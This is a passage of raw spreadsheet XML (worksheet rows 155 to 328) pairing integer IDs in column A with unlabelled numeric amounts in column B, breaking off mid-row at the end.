    <row r="155" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A155">
        <v>491</v>
      </c>
      <c r="B155" s="8">
        <v>2012000</v>
      </c>
    </row>
    <row r="156" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A156">
        <v>492</v>
      </c>
      <c r="B156" s="8">
        <v>50400</v>
      </c>
    </row>
    <row r="157" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A157">
        <v>495</v>
      </c>
      <c r="B157" s="8">
        <v>3770000</v>
      </c>
    </row>
    <row r="158" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A158">
        <v>500</v>
      </c>
      <c r="B158" s="8">
        <v>461000</v>
      </c>
    </row>
    <row r="159" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A159">
        <v>501</v>
      </c>
      <c r="B159" s="8">
        <v>7680</v>
      </c>
    </row>
    <row r="160" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A160">
        <v>502</v>
      </c>
      <c r="B160" s="8">
        <v>1800</v>
      </c>
    </row>
    <row r="161" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A161">
        <v>506</v>
      </c>
      <c r="B161" s="8">
        <v>6049000</v>
      </c>
    </row>
    <row r="162" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A162">
        <v>507</v>
      </c>
      <c r="B162" s="8">
        <v>1032000</v>
      </c>
    </row>
    <row r="163" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A163">
        <v>509</v>
      </c>
      <c r="B163" s="8">
        <v>385000</v>
      </c>
    </row>
    <row r="164" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A164">
        <v>510</v>
      </c>
      <c r="B164" s="8">
        <v>2400</v>
      </c>
    </row>
    <row r="165" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A165">
        <v>511</v>
      </c>
      <c r="B165" s="8">
        <v>258655</v>
      </c>
    </row>
    <row r="166" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A166">
        <v>512</v>
      </c>
      <c r="B166" s="8">
        <v>1017848</v>
      </c>
    </row>
    <row r="167" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A167">
        <v>514</v>
      </c>
      <c r="B167" s="8">
        <v>1200000</v>
      </c>
    </row>
    <row r="168" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A168">
        <v>515</v>
      </c>
      <c r="B168" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="169" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A169">
        <v>518</v>
      </c>
      <c r="B169" s="8">
        <v>7580380</v>
      </c>
    </row>
    <row r="170" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A170">
        <v>519</v>
      </c>
      <c r="B170" s="8">
        <v>190050</v>
      </c>
    </row>
    <row r="171" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A171">
        <v>520</v>
      </c>
      <c r="B171" s="8">
        <v>750000</v>
      </c>
    </row>
    <row r="172" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A172">
        <v>524</v>
      </c>
      <c r="B172" s="8">
        <v>612367</v>
      </c>
    </row>
    <row r="173" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A173">
        <v>527</v>
      </c>
      <c r="B173" s="8">
        <v>1000</v>
      </c>
    </row>
    <row r="174" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A174">
        <v>528</v>
      </c>
      <c r="B174" s="8">
        <v>2400</v>
      </c>
    </row>
    <row r="175" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A175">
        <v>529</v>
      </c>
      <c r="B175" s="8">
        <v>346850</v>
      </c>
    </row>
    <row r="176" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A176">
        <v>532</v>
      </c>
      <c r="B176" s="8">
        <v>1042500</v>
      </c>
    </row>
    <row r="177" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A177">
        <v>533</v>
      </c>
      <c r="B177" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="178" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A178">
        <v>537</v>
      </c>
      <c r="B178" s="8">
        <v>8571079</v>
      </c>
    </row>
    <row r="179" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A179">
        <v>538</v>
      </c>
      <c r="B179" s="8">
        <v>32500</v>
      </c>
    </row>
    <row r="180" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A180">
        <v>540</v>
      </c>
      <c r="B180" s="8">
        <v>159000</v>
      </c>
    </row>
    <row r="181" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A181">
        <v>541</v>
      </c>
      <c r="B181" s="8">
        <v>488100</v>
      </c>
    </row>
    <row r="182" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A182">
        <v>548</v>
      </c>
      <c r="B182" s="8">
        <v>3691598</v>
      </c>
    </row>
    <row r="183" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A183">
        <v>549</v>
      </c>
      <c r="B183" s="8">
        <v>500</v>
      </c>
    </row>
    <row r="184" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A184">
        <v>551</v>
      </c>
      <c r="B184" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="185" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A185">
        <v>558</v>
      </c>
      <c r="B185" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="186" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A186">
        <v>560</v>
      </c>
      <c r="B186" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="187" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A187">
        <v>561</v>
      </c>
      <c r="B187" s="8">
        <v>1900000</v>
      </c>
    </row>
    <row r="188" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A188">
        <v>563</v>
      </c>
      <c r="B188" s="8">
        <v>3996000</v>
      </c>
    </row>
    <row r="189" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A189">
        <v>564</v>
      </c>
      <c r="B189" s="8">
        <v>721343</v>
      </c>
    </row>
    <row r="190" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A190">
        <v>565</v>
      </c>
      <c r="B190" s="8">
        <v>480000</v>
      </c>
    </row>
    <row r="191" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A191">
        <v>567</v>
      </c>
      <c r="B191" s="8">
        <v>210000</v>
      </c>
    </row>
    <row r="192" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A192">
        <v>569</v>
      </c>
      <c r="B192" s="8">
        <v>8600</v>
      </c>
    </row>
    <row r="193" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A193">
        <v>571</v>
      </c>
      <c r="B193" s="8">
        <v>20400</v>
      </c>
    </row>
    <row r="194" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A194">
        <v>572</v>
      </c>
      <c r="B194" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="195" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A195">
        <v>575</v>
      </c>
      <c r="B195" s="8">
        <v>1128000</v>
      </c>
    </row>
    <row r="196" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A196">
        <v>577</v>
      </c>
      <c r="B196" s="8">
        <v>511300</v>
      </c>
    </row>
    <row r="197" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A197">
        <v>578</v>
      </c>
      <c r="B197" s="8">
        <v>205000</v>
      </c>
    </row>
    <row r="198" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A198">
        <v>582</v>
      </c>
      <c r="B198" s="8">
        <v>28000</v>
      </c>
    </row>
    <row r="199" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A199">
        <v>583</v>
      </c>
      <c r="B199" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="200" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A200">
        <v>590</v>
      </c>
      <c r="B200" s="8">
        <v>955400</v>
      </c>
    </row>
    <row r="201" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A201">
        <v>592</v>
      </c>
      <c r="B201" s="8">
        <v>13600</v>
      </c>
    </row>
    <row r="202" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A202">
        <v>593</v>
      </c>
      <c r="B202" s="8">
        <v>900000</v>
      </c>
    </row>
    <row r="203" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A203">
        <v>594</v>
      </c>
      <c r="B203" s="8">
        <v>1250000</v>
      </c>
    </row>
    <row r="204" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A204">
        <v>596</v>
      </c>
      <c r="B204" s="8">
        <v>753000</v>
      </c>
    </row>
    <row r="205" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A205">
        <v>597</v>
      </c>
      <c r="B205" s="8">
        <v>24600</v>
      </c>
    </row>
    <row r="206" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A206">
        <v>600</v>
      </c>
      <c r="B206" s="8">
        <v>160050</v>
      </c>
    </row>
    <row r="207" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A207">
        <v>603</v>
      </c>
      <c r="B207" s="8">
        <v>70000</v>
      </c>
    </row>
    <row r="208" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A208">
        <v>604</v>
      </c>
      <c r="B208" s="8">
        <v>811246</v>
      </c>
    </row>
    <row r="209" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A209">
        <v>606</v>
      </c>
      <c r="B209" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="210" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A210">
        <v>608</v>
      </c>
      <c r="B210" s="8">
        <v>1035000</v>
      </c>
    </row>
    <row r="211" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A211">
        <v>609</v>
      </c>
      <c r="B211" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="212" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A212">
        <v>610</v>
      </c>
      <c r="B212" s="8">
        <v>810000</v>
      </c>
    </row>
    <row r="213" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A213">
        <v>613</v>
      </c>
      <c r="B213" s="8">
        <v>4800000</v>
      </c>
    </row>
    <row r="214" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A214">
        <v>618</v>
      </c>
      <c r="B214" s="8">
        <v>2692129</v>
      </c>
    </row>
    <row r="215" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A215">
        <v>621</v>
      </c>
      <c r="B215" s="8">
        <v>1480000</v>
      </c>
    </row>
    <row r="216" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A216">
        <v>622</v>
      </c>
      <c r="B216" s="8">
        <v>128270</v>
      </c>
    </row>
    <row r="217" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A217">
        <v>624</v>
      </c>
      <c r="B217" s="8">
        <v>720000</v>
      </c>
    </row>
    <row r="218" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A218">
        <v>625</v>
      </c>
      <c r="B218" s="8">
        <v>3924688</v>
      </c>
    </row>
    <row r="219" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A219">
        <v>631</v>
      </c>
      <c r="B219" s="8">
        <v>40095</v>
      </c>
    </row>
    <row r="220" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A220">
        <v>632</v>
      </c>
      <c r="B220" s="8">
        <v>490000</v>
      </c>
    </row>
    <row r="221" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A221">
        <v>633</v>
      </c>
      <c r="B221" s="8">
        <v>78037888</v>
      </c>
    </row>
    <row r="222" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A222">
        <v>634</v>
      </c>
      <c r="B222" s="8">
        <v>565000</v>
      </c>
    </row>
    <row r="223" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A223">
        <v>640</v>
      </c>
      <c r="B223" s="8">
        <v>2250000</v>
      </c>
    </row>
    <row r="224" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A224">
        <v>642</v>
      </c>
      <c r="B224" s="8">
        <v>225018.84</v>
      </c>
    </row>
    <row r="225" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A225">
        <v>645</v>
      </c>
      <c r="B225" s="8">
        <v>6000</v>
      </c>
    </row>
    <row r="226" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A226">
        <v>650</v>
      </c>
      <c r="B226" s="8">
        <v>188000</v>
      </c>
    </row>
    <row r="227" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A227">
        <v>655</v>
      </c>
      <c r="B227" s="8">
        <v>320000</v>
      </c>
    </row>
    <row r="228" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A228">
        <v>656</v>
      </c>
      <c r="B228" s="8">
        <v>738000</v>
      </c>
    </row>
    <row r="229" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A229">
        <v>658</v>
      </c>
      <c r="B229" s="8">
        <v>961800</v>
      </c>
    </row>
    <row r="230" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A230">
        <v>660</v>
      </c>
      <c r="B230" s="8">
        <v>2766000</v>
      </c>
    </row>
    <row r="231" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A231">
        <v>661</v>
      </c>
      <c r="B231" s="8">
        <v>1700</v>
      </c>
    </row>
    <row r="232" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A232">
        <v>662</v>
      </c>
      <c r="B232" s="8">
        <v>15000</v>
      </c>
    </row>
    <row r="233" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A233">
        <v>664</v>
      </c>
      <c r="B233" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="234" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A234">
        <v>667</v>
      </c>
      <c r="B234" s="8">
        <v>40000</v>
      </c>
    </row>
    <row r="235" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A235">
        <v>671</v>
      </c>
      <c r="B235" s="8">
        <v>351000</v>
      </c>
    </row>
    <row r="236" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A236">
        <v>674</v>
      </c>
      <c r="B236" s="8">
        <v>890481</v>
      </c>
    </row>
    <row r="237" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A237">
        <v>678</v>
      </c>
      <c r="B237" s="8">
        <v>1500000</v>
      </c>
    </row>
    <row r="238" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A238">
        <v>679</v>
      </c>
      <c r="B238" s="8">
        <v>36000</v>
      </c>
    </row>
    <row r="239" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A239">
        <v>680</v>
      </c>
      <c r="B239" s="8">
        <v>1045436</v>
      </c>
    </row>
    <row r="240" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A240">
        <v>681</v>
      </c>
      <c r="B240" s="8">
        <v>1410000</v>
      </c>
    </row>
    <row r="241" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A241">
        <v>683</v>
      </c>
      <c r="B241" s="8">
        <v>4000</v>
      </c>
    </row>
    <row r="242" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A242">
        <v>684</v>
      </c>
      <c r="B242" s="8">
        <v>8000</v>
      </c>
    </row>
    <row r="243" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A243">
        <v>686</v>
      </c>
      <c r="B243" s="8">
        <v>700000</v>
      </c>
    </row>
    <row r="244" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A244">
        <v>689</v>
      </c>
      <c r="B244" s="8">
        <v>8200</v>
      </c>
    </row>
    <row r="245" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A245">
        <v>690</v>
      </c>
      <c r="B245" s="8">
        <v>480000</v>
      </c>
    </row>
    <row r="246" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A246">
        <v>691</v>
      </c>
      <c r="B246" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="247" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A247">
        <v>701</v>
      </c>
      <c r="B247" s="8">
        <v>205000</v>
      </c>
    </row>
    <row r="248" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A248">
        <v>704</v>
      </c>
      <c r="B248" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="249" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A249">
        <v>708</v>
      </c>
      <c r="B249" s="8">
        <v>45000</v>
      </c>
    </row>
    <row r="250" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A250">
        <v>709</v>
      </c>
      <c r="B250" s="8">
        <v>550000</v>
      </c>
    </row>
    <row r="251" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A251">
        <v>710</v>
      </c>
      <c r="B251" s="8">
        <v>1200</v>
      </c>
    </row>
    <row r="252" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A252">
        <v>711</v>
      </c>
      <c r="B252" s="8">
        <v>720</v>
      </c>
    </row>
    <row r="253" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A253">
        <v>715</v>
      </c>
      <c r="B253" s="8">
        <v>210000</v>
      </c>
    </row>
    <row r="254" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A254">
        <v>716</v>
      </c>
      <c r="B254" s="8">
        <v>2100000</v>
      </c>
    </row>
    <row r="255" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A255">
        <v>721</v>
      </c>
      <c r="B255" s="8">
        <v>5686607</v>
      </c>
    </row>
    <row r="256" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A256">
        <v>722</v>
      </c>
      <c r="B256" s="8">
        <v>1840000</v>
      </c>
    </row>
    <row r="257" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A257">
        <v>732</v>
      </c>
      <c r="B257" s="8">
        <v>75000</v>
      </c>
    </row>
    <row r="258" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A258">
        <v>734</v>
      </c>
      <c r="B258" s="8">
        <v>41751</v>
      </c>
    </row>
    <row r="259" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A259">
        <v>735</v>
      </c>
      <c r="B259" s="8">
        <v>350000</v>
      </c>
    </row>
    <row r="260" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A260">
        <v>736</v>
      </c>
      <c r="B260" s="8">
        <v>235000</v>
      </c>
    </row>
    <row r="261" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A261">
        <v>737</v>
      </c>
      <c r="B261" s="8">
        <v>79476.34</v>
      </c>
    </row>
    <row r="262" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A262">
        <v>738</v>
      </c>
      <c r="B262" s="8">
        <v>250000</v>
      </c>
    </row>
    <row r="263" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A263">
        <v>739</v>
      </c>
      <c r="B263" s="8">
        <v>768</v>
      </c>
    </row>
    <row r="264" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A264">
        <v>743</v>
      </c>
      <c r="B264" s="8">
        <v>188000</v>
      </c>
    </row>
    <row r="265" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A265">
        <v>746</v>
      </c>
      <c r="B265" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="266" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A266">
        <v>755</v>
      </c>
      <c r="B266" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="267" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A267">
        <v>756</v>
      </c>
      <c r="B267" s="8">
        <v>19000</v>
      </c>
    </row>
    <row r="268" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A268">
        <v>758</v>
      </c>
      <c r="B268" s="8">
        <v>230000</v>
      </c>
    </row>
    <row r="269" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A269">
        <v>759</v>
      </c>
      <c r="B269" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="270" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A270">
        <v>760</v>
      </c>
      <c r="B270" s="8">
        <v>360000</v>
      </c>
    </row>
    <row r="271" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A271">
        <v>761</v>
      </c>
      <c r="B271" s="8">
        <v>86000</v>
      </c>
    </row>
    <row r="272" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A272">
        <v>764</v>
      </c>
      <c r="B272" s="8">
        <v>425200</v>
      </c>
    </row>
    <row r="273" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A273">
        <v>766</v>
      </c>
      <c r="B273" s="8">
        <v>3400000</v>
      </c>
    </row>
    <row r="274" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A274">
        <v>768</v>
      </c>
      <c r="B274" s="8">
        <v>2806525</v>
      </c>
    </row>
    <row r="275" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A275">
        <v>769</v>
      </c>
      <c r="B275" s="8">
        <v>4901375.9000000004</v>
      </c>
    </row>
    <row r="276" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A276">
        <v>771</v>
      </c>
      <c r="B276" s="8">
        <v>595000</v>
      </c>
    </row>
    <row r="277" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A277">
        <v>773</v>
      </c>
      <c r="B277" s="8">
        <v>461000</v>
      </c>
    </row>
    <row r="278" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A278">
        <v>775</v>
      </c>
      <c r="B278" s="8">
        <v>330100</v>
      </c>
    </row>
    <row r="279" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A279">
        <v>777</v>
      </c>
      <c r="B279" s="8">
        <v>104720</v>
      </c>
    </row>
    <row r="280" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A280">
        <v>779</v>
      </c>
      <c r="B280" s="8">
        <v>100112000</v>
      </c>
    </row>
    <row r="281" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A281">
        <v>782</v>
      </c>
      <c r="B281" s="8">
        <v>46000</v>
      </c>
    </row>
    <row r="282" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A282">
        <v>784</v>
      </c>
      <c r="B282" s="8">
        <v>420000</v>
      </c>
    </row>
    <row r="283" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A283">
        <v>791</v>
      </c>
      <c r="B283" s="8">
        <v>12000</v>
      </c>
    </row>
    <row r="284" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A284">
        <v>792</v>
      </c>
      <c r="B284" s="8">
        <v>684000</v>
      </c>
    </row>
    <row r="285" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A285">
        <v>794</v>
      </c>
      <c r="B285" s="8">
        <v>82740</v>
      </c>
    </row>
    <row r="286" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A286">
        <v>796</v>
      </c>
      <c r="B286" s="8">
        <v>2258000</v>
      </c>
    </row>
    <row r="287" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A287">
        <v>800</v>
      </c>
      <c r="B287" s="8">
        <v>2694538</v>
      </c>
    </row>
    <row r="288" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A288">
        <v>803</v>
      </c>
      <c r="B288" s="8">
        <v>118000</v>
      </c>
    </row>
    <row r="289" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A289">
        <v>806</v>
      </c>
      <c r="B289" s="8">
        <v>9000</v>
      </c>
    </row>
    <row r="290" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A290">
        <v>824</v>
      </c>
      <c r="B290" s="8">
        <v>270000</v>
      </c>
    </row>
    <row r="291" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A291">
        <v>825</v>
      </c>
      <c r="B291" s="8">
        <v>5662000</v>
      </c>
    </row>
    <row r="292" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A292">
        <v>826</v>
      </c>
      <c r="B292" s="8">
        <v>25020000</v>
      </c>
    </row>
    <row r="293" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A293">
        <v>830</v>
      </c>
      <c r="B293" s="8">
        <v>2121507.56</v>
      </c>
    </row>
    <row r="294" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A294">
        <v>834</v>
      </c>
      <c r="B294" s="8">
        <v>273800</v>
      </c>
    </row>
    <row r="295" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A295">
        <v>837</v>
      </c>
      <c r="B295" s="8">
        <v>22000</v>
      </c>
    </row>
    <row r="296" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A296">
        <v>840</v>
      </c>
      <c r="B296" s="8">
        <v>14400</v>
      </c>
    </row>
    <row r="297" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A297">
        <v>841</v>
      </c>
      <c r="B297" s="8">
        <v>6920100</v>
      </c>
    </row>
    <row r="298" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A298">
        <v>848</v>
      </c>
      <c r="B298" s="8">
        <v>500</v>
      </c>
    </row>
    <row r="299" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A299">
        <v>853</v>
      </c>
      <c r="B299" s="8">
        <v>318000</v>
      </c>
    </row>
    <row r="300" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A300">
        <v>862</v>
      </c>
      <c r="B300" s="8">
        <v>2950000</v>
      </c>
    </row>
    <row r="301" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A301">
        <v>873</v>
      </c>
      <c r="B301" s="8">
        <v>351000</v>
      </c>
    </row>
    <row r="302" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A302">
        <v>879</v>
      </c>
      <c r="B302" s="8">
        <v>25000</v>
      </c>
    </row>
    <row r="303" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A303">
        <v>881</v>
      </c>
      <c r="B303" s="8">
        <v>520000</v>
      </c>
    </row>
    <row r="304" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A304">
        <v>882</v>
      </c>
      <c r="B304" s="8">
        <v>58105</v>
      </c>
    </row>
    <row r="305" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A305">
        <v>883</v>
      </c>
      <c r="B305" s="8">
        <v>780000</v>
      </c>
    </row>
    <row r="306" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A306">
        <v>888</v>
      </c>
      <c r="B306" s="8">
        <v>10540539</v>
      </c>
    </row>
    <row r="307" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A307">
        <v>892</v>
      </c>
      <c r="B307" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="308" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A308">
        <v>895</v>
      </c>
      <c r="B308" s="8">
        <v>549652</v>
      </c>
    </row>
    <row r="309" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A309">
        <v>896</v>
      </c>
      <c r="B309" s="8">
        <v>15000</v>
      </c>
    </row>
    <row r="310" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A310">
        <v>899</v>
      </c>
      <c r="B310" s="8">
        <v>208198</v>
      </c>
    </row>
    <row r="311" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A311">
        <v>901</v>
      </c>
      <c r="B311" s="8">
        <v>384000</v>
      </c>
    </row>
    <row r="312" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A312">
        <v>905</v>
      </c>
      <c r="B312" s="8">
        <v>47000</v>
      </c>
    </row>
    <row r="313" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A313">
        <v>906</v>
      </c>
      <c r="B313" s="8">
        <v>401000</v>
      </c>
    </row>
    <row r="314" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A314">
        <v>907</v>
      </c>
      <c r="B314" s="8">
        <v>780000</v>
      </c>
    </row>
    <row r="315" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A315">
        <v>908</v>
      </c>
      <c r="B315" s="8">
        <v>75760</v>
      </c>
    </row>
    <row r="316" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A316">
        <v>909</v>
      </c>
      <c r="B316" s="8">
        <v>70550</v>
      </c>
    </row>
    <row r="317" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A317">
        <v>911</v>
      </c>
      <c r="B317" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="318" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A318">
        <v>913</v>
      </c>
      <c r="B318" s="8">
        <v>1200000</v>
      </c>
    </row>
    <row r="319" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A319">
        <v>915</v>
      </c>
      <c r="B319" s="8">
        <v>420000</v>
      </c>
    </row>
    <row r="320" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A320">
        <v>916</v>
      </c>
      <c r="B320" s="8">
        <v>20624</v>
      </c>
    </row>
    <row r="321" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A321">
        <v>919</v>
      </c>
      <c r="B321" s="8">
        <v>2400</v>
      </c>
    </row>
    <row r="322" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A322">
        <v>922</v>
      </c>
      <c r="B322" s="8">
        <v>1125000</v>
      </c>
    </row>
    <row r="323" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A323">
        <v>925</v>
      </c>
      <c r="B323" s="8">
        <v>325000</v>
      </c>
    </row>
    <row r="324" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A324">
        <v>927</v>
      </c>
      <c r="B324" s="8">
        <v>4200000</v>
      </c>
    </row>
    <row r="325" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A325">
        <v>929</v>
      </c>
      <c r="B325" s="8">
        <v>6800000</v>
      </c>
    </row>
    <row r="326" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A326">
        <v>930</v>
      </c>
      <c r="B326" s="8">
        <v>1150000</v>
      </c>
    </row>
    <row r="327" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A327">
        <v>932</v>
      </c>
      <c r="B327" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="328" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A328">
        <v>935</v>
      </c>
      <c r="B328" s="8">
